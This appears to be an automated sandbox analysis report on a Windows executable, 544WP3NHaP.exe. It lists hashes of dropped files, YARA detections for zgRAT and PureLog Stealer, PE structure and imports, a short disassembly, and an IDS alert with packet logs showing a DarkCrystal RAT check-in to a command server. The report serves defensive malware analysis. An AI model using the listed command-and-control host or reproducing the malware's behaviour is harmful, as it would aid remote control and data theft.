                                                                                                                                SHA-256:EA2D9D8560B51D1DC513F882ED29CE9D166A0BE2F5AC29FBE746E53997D962E7
                                                                                                                                SHA-512:F7C51D6B821BFF16A558A25C1C32190F7CA566809094391407DC0211891F552FCAFF3B54D4F98D76ED7C3610995A730436D4A44E22987FFE8D0A245BB6922E07
                                                                                                                                Malicious:false
                                                                                                                                Process:C:\Users\user\Desktop\544WP3NHaP.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):215
                                                                                                                                Entropy (8bit):5.735529192912125
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6:GigwqK+NkLzWbHmrFnBaORbM5nCccnkd4Rds:GoMCzWLmhBaORbQCFkd4Hs
                                                                                                                                MD5:CCBE3C4CFE1A134DB74A5A9C0EC0A573
                                                                                                                                SHA1:4F2846FF85B05FEF53EC2BA7F750ECF97E1DC5A5
                                                                                                                                SHA-256:D9063FA3649E48CF51433373373E3FA5481C1A0443700052742FAE4C27073A39
                                                                                                                                SHA-512:B096B860CD655FFA3B5B97523509DBC9FDE99CBE3CA8609DA4B62D7C4164A0C8417CA4115C32D11D32DF04C1EC9D303C7744A5E4482CB45A95CC2F9BA4CF31E7
                                                                                                                                Malicious:true
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                Process:C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe
                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):256
                                                                                                                                Entropy (8bit):5.7559552411681665
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6:JlddVWH29+c13jQ/5BfcnxwrbetHI0Fvc9wPl9n:3ddkH29+EU/5q++tHF5Wwrn
                                                                                                                                MD5:AA2FB4EF5AF448CBABF4B902470C9218
                                                                                                                                SHA1:5C0FF4ABBBE1994DED478BDF6B04DB844308F996
                                                                                                                                SHA-256:FA85E1510043BF194B0CC8F7F2BD6768B6140F986CA4822E208A31AE3114F723
                                                                                                                                SHA-512:1F03EE2D14B60D24CAABA6DBDE21D61F1A710D28DD88CB3EBFB4D4BCC19F3874412617305A0035ABECC6E44780202ECE8155D7E9B9A0D5418321EB70C5A42C9E
                                                                                                                                Malicious:false
                                                                                                                                Process:C:\Users\user\Desktop\544WP3NHaP.exe
                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1913344
                                                                                                                                Entropy (8bit):7.53887100759396
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:49152:unUENJIo5FiAVjO1OtgyKzGgA2Xnb6d0:unV5FiKlvbyOd
                                                                                                                                MD5:F9C0873D0CBC71DB9729CDF3B976A5AD
                                                                                                                                SHA1:D83C575DC2621B593918660EEC03CE077D5FAC39
                                                                                                                                SHA-256:565BB537A0AA8344D7AFAC9DD87DAB20AD33CF09B5F833476EE6C00BFDC938DC
                                                                                                                                SHA-512:96DA7384FB9A2B494077E0CF6CB5E0F4FC11C57B9F3ACD1E3E0F5549F22938056FEC4EDA5B9D0D7B773AFFAD9BF99D03A1C782A74E480A0830D63C3296C7AD18
                                                                                                                                Malicious:true
                                                                                                                                Yara Hits:
                                                                                                                                • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe, Author: Joe Security
                                                                                                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe, Author: Joe Security
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                • Antivirus: ReversingLabs, Detection: 74%
                                                                                                                                Process:C:\bridgemssurrogateintonet\bridgeportDhcpcommon.exe
                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):1913344
                                                                                                                                Entropy (8bit):7.53887100759396
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:49152:unUENJIo5FiAVjO1OtgyKzGgA2Xnb6d0:unV5FiKlvbyOd
                                                                                                                                MD5:F9C0873D0CBC71DB9729CDF3B976A5AD
                                                                                                                                SHA1:D83C575DC2621B593918660EEC03CE077D5FAC39
                                                                                                                                SHA-256:565BB537A0AA8344D7AFAC9DD87DAB20AD33CF09B5F833476EE6C00BFDC938DC
                                                                                                                                SHA-512:96DA7384FB9A2B494077E0CF6CB5E0F4FC11C57B9F3ACD1E3E0F5549F22938056FEC4EDA5B9D0D7B773AFFAD9BF99D03A1C782A74E480A0830D63C3296C7AD18
                                                                                                                                Malicious:true
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 74%
                                                                                                                                Process:C:\Windows\System32\w32tm.exe
                                                                                                                                File Type:ASCII text
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):151
                                                                                                                                Entropy (8bit):4.815159774221702
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:3:VLV993J+miJWEoJ8FXhRQum5VLvXVJFAqvom5QLy6vj:Vx993DEUGBm5teVm5Qu8
                                                                                                                                MD5:BD6AFC1CC87E3C6F60428DC3CD0CBCB4
                                                                                                                                SHA1:33CCD4DAEB7000B4B54E977010A88AA5661305EE
                                                                                                                                SHA-256:075F00274F54C4CF636A8FC1BB7A3AA25820D8017A2E3A75121D2833FF3E6520
                                                                                                                                SHA-512:260B0AFE1FD60ECA1135F64441C3AF89B8B62CE5B0FDC6A49A1F3AF4EF56D3B85A62ECBF56899A4AC53E86A5D6F9C46214F65EA38FD6E58B80DB41F468DF10C9
                                                                                                                                Malicious:false
                                                                                                                                Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 01/01/2025 17:46:40..17:46:40, error: 0x80072746.17:46:45, error: 0x80072746.
                                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                Entropy (8bit):7.476797017112258
                                                                                                                                TrID:
                                                                                                                                • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                                                                                • Win32 Executable (generic) a (10002005/4) 49.97%
                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                • DOS Executable Generic (2002/1) 0.01%
                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                File name:544WP3NHaP.exe
                                                                                                                                File size:2'235'083 bytes
                                                                                                                                MD5:50abe040b81818bf7ece156a10dbbbc9
                                                                                                                                SHA1:6abd8cfaaeea27ea9b2c7e5a6e05e9f4357c6050
                                                                                                                                SHA256:730cba8b2d68de1062f9ccaa22e62b4cdb71f08283d1d5fd985941e7e3087921
                                                                                                                                SHA512:48f382969adae8e40bdf5825581d2d545a2b8741889f42e79cd8379ce48c8d91c28eee924d36416b6331a8ad4c3e1c0772c5cea110b1355d9debd58f329da078
                                                                                                                                SSDEEP:49152:IBJEnUENJIo5FiAVjO1OtgyKzGgA2Xnb6d0v:y+nV5FiKlvbyOd6
                                                                                                                                TLSH:57A5BE1279D24F32C2E95B3186564A3E5296D7223A51FF1F361F21C6A9177F08E322B3
                                                                                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I..>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I..=>...I..=>.
                                                                                                                                Icon Hash:1515d4d4442f2d2d
                                                                                                                                Entrypoint:0x41f530
                                                                                                                                Entrypoint Section:.text
                                                                                                                                Digitally signed:false
                                                                                                                                Imagebase:0x400000
                                                                                                                                Subsystem:windows gui
                                                                                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                                Time Stamp:0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
                                                                                                                                TLS Callbacks:
                                                                                                                                CLR (.Net) Version:
                                                                                                                                OS Version Major:5
                                                                                                                                OS Version Minor:1
                                                                                                                                File Version Major:5
                                                                                                                                File Version Minor:1
                                                                                                                                Subsystem Version Major:5
                                                                                                                                Subsystem Version Minor:1
                                                                                                                                Import Hash:12e12319f1029ec4f8fcbed7e82df162
                                                                                                                                Instruction
                                                                                                                                call 00007F7C347FBEFBh
                                                                                                                                jmp 00007F7C347FB80Dh
                                                                                                                                int3
                                                                                                                                int3
                                                                                                                                int3
                                                                                                                                int3
                                                                                                                                int3
                                                                                                                                int3
                                                                                                                                push ebp
                                                                                                                                mov ebp, esp
                                                                                                                                push esi
                                                                                                                                push dword ptr [ebp+08h]
                                                                                                                                mov esi, ecx
                                                                                                                                call 00007F7C347EE657h
                                                                                                                                mov dword ptr [esi], 004356D0h
                                                                                                                                mov eax, esi
                                                                                                                                pop esi
                                                                                                                                pop ebp
                                                                                                                                retn 0004h
                                                                                                                                and dword ptr [ecx+04h], 00000000h
                                                                                                                                mov eax, ecx
                                                                                                                                and dword ptr [ecx+08h], 00000000h
                                                                                                                                mov dword ptr [ecx+04h], 004356D8h
                                                                                                                                mov dword ptr [ecx], 004356D0h
                                                                                                                                ret
                                                                                                                                int3
                                                                                                                                int3
                                                                                                                                int3
                                                                                                                                int3
                                                                                                                                int3
                                                                                                                                int3
                                                                                                                                int3
                                                                                                                                int3
                                                                                                                                int3
                                                                                                                                int3
                                                                                                                                int3
                                                                                                                                int3
                                                                                                                                int3
                                                                                                                                push ebp
                                                                                                                                mov ebp, esp
                                                                                                                                push esi
                                                                                                                                mov esi, ecx
                                                                                                                                lea eax, dword ptr [esi+04h]
                                                                                                                                mov dword ptr [esi], 004356B8h
                                                                                                                                push eax
                                                                                                                                call 00007F7C347FEC9Fh
                                                                                                                                test byte ptr [ebp+08h], 00000001h
                                                                                                                                pop ecx
                                                                                                                                je 00007F7C347FB99Ch
                                                                                                                                push 0000000Ch
                                                                                                                                push esi
                                                                                                                                call 00007F7C347FAF59h
                                                                                                                                pop ecx
                                                                                                                                pop ecx
                                                                                                                                mov eax, esi
                                                                                                                                pop esi
                                                                                                                                pop ebp
                                                                                                                                retn 0004h
                                                                                                                                push ebp
                                                                                                                                mov ebp, esp
                                                                                                                                sub esp, 0Ch
                                                                                                                                lea ecx, dword ptr [ebp-0Ch]
                                                                                                                                call 00007F7C347EE5D2h
                                                                                                                                push 0043BEF0h
                                                                                                                                lea eax, dword ptr [ebp-0Ch]
                                                                                                                                push eax
                                                                                                                                call 00007F7C347FE759h
                                                                                                                                int3
                                                                                                                                push ebp
                                                                                                                                mov ebp, esp
                                                                                                                                sub esp, 0Ch
                                                                                                                                lea ecx, dword ptr [ebp-0Ch]
                                                                                                                                call 00007F7C347FB918h
                                                                                                                                push 0043C0F4h
                                                                                                                                lea eax, dword ptr [ebp-0Ch]
                                                                                                                                push eax
                                                                                                                                call 00007F7C347FE73Ch
                                                                                                                                int3
                                                                                                                                jmp 00007F7C348001D7h
                                                                                                                                int3
                                                                                                                                int3
                                                                                                                                int3
                                                                                                                                int3
                                                                                                                                push 00422900h
                                                                                                                                push dword ptr fs:[00000000h]
                                                                                                                                Programming Language:
                                                                                                                                • [ C ] VS2008 SP1 build 30729
                                                                                                                                • [IMP] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x3d070 | 0x34 | .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3d0a4 | 0x50 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x64000 | 0xdff8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x72000 | 0x233c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x3b11c | 0x54 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x355f8 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x33000 | 0x278 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x3c5ec | 0x120 | .rdata
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x31bdc | 0x31c00 | 2831bb8b11e3209658a53131886cdf98 | False | 0.5909380888819096 | data | 6.712962136932442 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x33000 | 0xaec0 | 0xb000 | 042f11346230ca5aa360727d9908e809 | False | 0.4579190340909091 | data | 5.261605615899847 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x3e000 | 0x24720 | 0x1000 | 9670b581969e508258d8bc903025de5e | False | 0.451416015625 | data | 4.387459135575936 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.didat | 0x63000 | 0x190 | 0x200 | c83554035c63bb446c6208d0c8fa0256 | False | 0.4453125 | data | 3.3327310103022305 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x64000 | 0xdff8 | 0xe000 | ba08fbcd0ed7d9e6a268d75148d9914b | False | 0.6373639787946429 | data | 6.638661032196024 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x72000 | 0x233c | 0x2400 | 40b5e17755fd6fdd34de06e5cdb7f711 | False | 0.7749565972222222 | data | 6.623012966548067 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
PNG | 0x64650 | 0xb45 | PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced | English | United States | 1.0027729636048528
PNG | 0x65198 | 0x15a9 | PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced | English | United States | 0.9363390441839495
RT_ICON | 0x66748 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.47832369942196534
RT_ICON | 0x66cb0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.5410649819494585
RT_ICON | 0x67558 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.4933368869936034
RT_ICON | 0x68400 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m | English | United States | 0.5390070921985816
RT_ICON | 0x68868 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m | English | United States | 0.41393058161350843
RT_ICON | 0x69910 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m | English | United States | 0.3479253112033195
RT_ICON | 0x6beb8 | 0x3d71 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9809269502193401
RT_DIALOG | 0x70588 | 0x286 | data | English | United States | 0.5092879256965944
RT_DIALOG | 0x70358 | 0x13a | data | English | United States | 0.60828025477707
RT_DIALOG | 0x70498 | 0xec | data | English | United States | 0.6991525423728814
RT_DIALOG | 0x70228 | 0x12e | data | English | United States | 0.5927152317880795
RT_DIALOG | 0x6fef0 | 0x338 | data | English | United States | 0.45145631067961167
RT_DIALOG | 0x6fc98 | 0x252 | data | English | United States | 0.5757575757575758
RT_STRING | 0x70f68 | 0x1e2 | data | English | United States | 0.3900414937759336
RT_STRING | 0x71150 | 0x1cc | data | English | United States | 0.4282608695652174
RT_STRING | 0x71320 | 0x1b8 | data | English | United States | 0.45681818181818185
RT_STRING | 0x714d8 | 0x146 | data | English | United States | 0.5153374233128835
RT_STRING | 0x71620 | 0x46c | data | English | United States | 0.3454063604240283
RT_STRING | 0x71a90 | 0x166 | data | English | United States | 0.49162011173184356
RT_STRING | 0x71bf8 | 0x152 | data | English | United States | 0.5059171597633136
RT_STRING | 0x71d50 | 0x10a | data | English | United States | 0.49624060150375937
RT_STRING | 0x71e60 | 0xbc | data | English | United States | 0.6329787234042553
RT_STRING | 0x71f20 | 0xd6 | data | English | United States | 0.5747663551401869
RT_GROUP_ICON | 0x6fc30 | 0x68 | data | English | United States | 0.7019230769230769
RT_MANIFEST | 0x70810 | 0x753 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.3957333333333333
DLL | Import
KERNEL32.dll | GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
OLEAUT32.dll | SysAllocString, SysFreeString, VariantClear
gdiplus.dll | GdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree
Language of compilation system | Country where language is spoken | Map
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-01T21:47:26.530224+0100 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.4 | 49736 | 172.67.220.198 | 80 | TCP
                                                                                                                                Jan 1, 2025 21:47:32.049226046 CET8049746172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:32.049228907 CET8049746172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:32.049266100 CET4974680192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:32.049280882 CET8049746172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:32.049285889 CET8049746172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:32.052381039 CET8049746172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:32.052534103 CET8049746172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:32.052537918 CET8049746172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:32.052541018 CET8049746172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:32.052570105 CET8049746172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:32.052640915 CET8049746172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:32.052645922 CET8049746172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:32.052660942 CET8049746172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:32.052691936 CET8049746172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:32.052741051 CET8049746172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:32.052743912 CET8049746172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:32.052751064 CET8049746172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:32.052999020 CET8049746172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:32.053003073 CET8049746172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:32.053069115 CET8049746172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:32.053072929 CET8049746172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:32.053080082 CET8049746172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:32.053082943 CET8049746172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:32.053195953 CET8049746172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:32.053199053 CET8049746172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:32.053206921 CET8049746172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:32.053210020 CET8049746172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:32.053212881 CET8049746172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:32.053215981 CET8049746172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:32.053219080 CET8049746172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:32.053225040 CET8049746172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:32.053601027 CET8049746172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:32.053659916 CET8049746172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:32.053663015 CET8049746172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:32.053666115 CET8049746172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:32.053700924 CET8049746172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:32.053704023 CET8049746172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:32.053781986 CET8049746172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:32.053786039 CET8049746172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:32.053792953 CET8049746172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:32.053796053 CET8049746172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:32.053800106 CET8049746172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:32.053828001 CET8049746172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:32.053832054 CET8049746172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:32.053838968 CET8049746172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:32.053842068 CET8049746172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:32.053848028 CET8049746172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:32.053869963 CET8049746172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:32.053873062 CET8049746172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:32.053894997 CET8049746172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:32.053899050 CET8049746172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:32.054002047 CET8049746172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:32.054004908 CET8049746172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:32.054040909 CET8049746172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:32.054044008 CET8049746172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:32.054069042 CET8049746172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:32.054071903 CET8049746172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:32.054212093 CET8049746172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:32.054215908 CET8049746172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:32.054224014 CET8049746172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:32.054227114 CET8049746172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:32.054233074 CET8049746172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:32.054235935 CET8049746172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:32.054241896 CET8049746172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:32.054244995 CET8049746172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:32.112818003 CET8049746172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:32.131284952 CET8049745172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:32.189671040 CET4974680192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:32.189722061 CET4974580192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:32.218118906 CET8049745172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:32.298592091 CET4974580192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:32.370182991 CET4974580192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:32.371092081 CET4974780192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:32.375332117 CET8049745172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:32.375386953 CET4974580192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:32.375847101 CET8049747172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:32.375909090 CET4974780192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:32.375997066 CET4974780192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:32.381422997 CET8049747172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:32.735125065 CET4974780192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:32.740024090 CET8049747172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:32.850366116 CET8049747172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:32.905250072 CET4974780192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:33.187572956 CET8049747172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:33.235426903 CET4974780192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:33.294301033 CET8049746172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:33.348263979 CET4974680192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:33.348421097 CET4974780192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:33.353286982 CET8049746172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:33.353663921 CET4974680192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:33.353678942 CET8049747172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:33.353729963 CET4974780192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:33.402302027 CET4974980192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:33.408669949 CET8049749172.67.220.198192.168.2.4
